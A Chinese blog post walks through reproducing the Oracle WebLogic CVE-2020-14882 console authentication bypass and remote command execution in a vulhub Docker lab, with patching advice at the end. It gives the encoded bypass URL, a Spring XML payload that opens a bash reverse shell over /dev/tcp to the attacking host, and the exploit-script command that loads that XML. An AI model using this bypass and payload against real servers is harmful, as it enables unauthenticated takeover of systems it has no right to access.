CVE-2020-14882 Oracle WebLogic远程命令执行漏洞

已于 2022-06-28 10:36:14 修改
阅读量2.7k 收藏 5
点赞数 2
文章标签: 安全 web安全
于 2022-06-28 10:30:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dearya123/article/details/125496933
版权

目录

1.漏洞信息

2.环境搭建

3.漏洞复现

4.漏洞利用

5.修复建议

漏洞信息

漏洞名称

Weblogic CVE-2020-14882未授权远程命令执行漏洞

漏洞编号

CVE-2020-14882

危害等级

高危

CVSS评分

9.8

漏洞类型

中间件漏洞

漏洞厂商

Oracle

漏洞组件

Oracle Weblogic server

受影响版本

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

漏洞概述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

环境搭建

2.1 环境概述

  1. Linux(kali)
  2. vulhub/weblogic/CVE-2020-14882

2.2搭建过程

1.Kali下载vulhub仓库

2.进入vulhub/weblogic/CVE-2020-14882目录下,使用命令docker-compose up –d启动环境

3.浏览器访问:你的ip:7001/console/login/LoginForm.jsp成功访问表示环境搭建成功

 漏洞复现

  1. 这里我们并不知道登录后台的用户名和密码,这里有一个绕过验证权限漏洞,我们构造了一个URL:http://yourip:7001/console/images/%252E%252E%252Fconsole.portal访问成功进入了后台, 但这里后台权限过低无法执行其他操作。

漏洞利用

1.有回显的利用

(1)使用已经撰写好的poc利用工具

(2)在攻击机上利用,这里成功回显到用户

2.外置xml文件无回显命令执行

1)新建一个xml文件,文件内容为

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
 <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/192.168.132.129/4444  0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

(2)开启服务端8000端口,使其能访问到poc.xml文件

(3)nc开启监听,端口为poc.xml中设置的端口

(4)攻击机中执行脚本

​
python3 CVE-2020-14882_ALL.py -u http://192.168.132.129:7001 -x http://192.168.132.129:8000/poc.xml

​

(5)监听端口可以查看已经成功获取到shell

 修复建议

  1. 及时下载官方补丁进行升级修复
  2. 禁止访问/console/console.portal

dearya123
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
weblogic——CVE_2020_14882
qq_17622203的博客
03-21 5214
影响版本 Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0 转自:weblogic 未授权命令执行漏洞CVE-2020-14882,CVE-2020-14883)复现 - My_Dreams - 博客园 vulfocus开
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
最新发布
m0_68045701的博客
07-10 1683
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 3653
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
探索CVE-2020-14882:一款全面的安全研究工具
gitblog_00093的博客
03-30 339
探索CVE-2020-14882:一款全面的安全研究工具 项目地址:https://gitcode.com/GGyao/CVE-2020-14882_ALL 在网络安全的世界里,了解并应对漏洞是至关重要的。GitCode上的CVE-2020-14882_ALL项目是一个专注于研究和解决CVE-2020-14882漏洞的开源平台。该项目旨在帮助开发者、安全研究人员和系统管理员深入理解这一特定的安全威...
CVE-2020-14882 weblogic未授权远程命令执行漏洞
栉风沐雪的博客
02-22 4334
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,未经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
**CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞详解** Oracle WebLogic Server 是一款由美国Oracle公司推出的Java EE架构应用服务器,它提供了用于开发、集成、部署和管理大型分布式Web应用、网络应用...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
weblogic 漏洞统计 CVE
09-18
1. CVE-2016-0696、CVE-2016-0700、CVE-2016-0675:这些漏洞主要涉及到WebLogic服务器的安全漏洞,可能允许远程攻击者执行任意代码或获取敏感信息。 2. CVE-2016-3416、CVE-2016-0688、CVE-2016-0638:这些是2016年...
weblogic CVE-2020-14882~14883漏洞分析
include_heqile的博客
12-13 646
http://144.34.164.217/weblogic-cve-2020-1488214883lou-dong-fen-xi.html
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6985
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 471
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
weblogic未授权访问漏洞复现(CVE-2020-14882
Armandhe的博客
06-07 4981
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
CVE-2020-14882 WebLogic远程代码执行漏洞
星落的博客
12-03 1504
目录 简介 实验环境 实验环境部署 漏洞复现 POC代码 简介 Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。 利用该漏洞远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在未经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。 实验环境 vulhub weblogic12.2.
CVE-2020-14882Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 6194
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
CVE-2020-14882 weblogic 未授权命令执行复现及分析
weixin_39811856的博客
10-30 949
简介 该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。 环境搭建 windows server 2012 weblogic 12 通过宽字节安全的分析来看(调试源码): http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi") ...
CVE-2020-14882漏洞修复
07-28
- *1* [CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复](https://blog.csdn.net/weixin_38896449/article/details/110480656)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值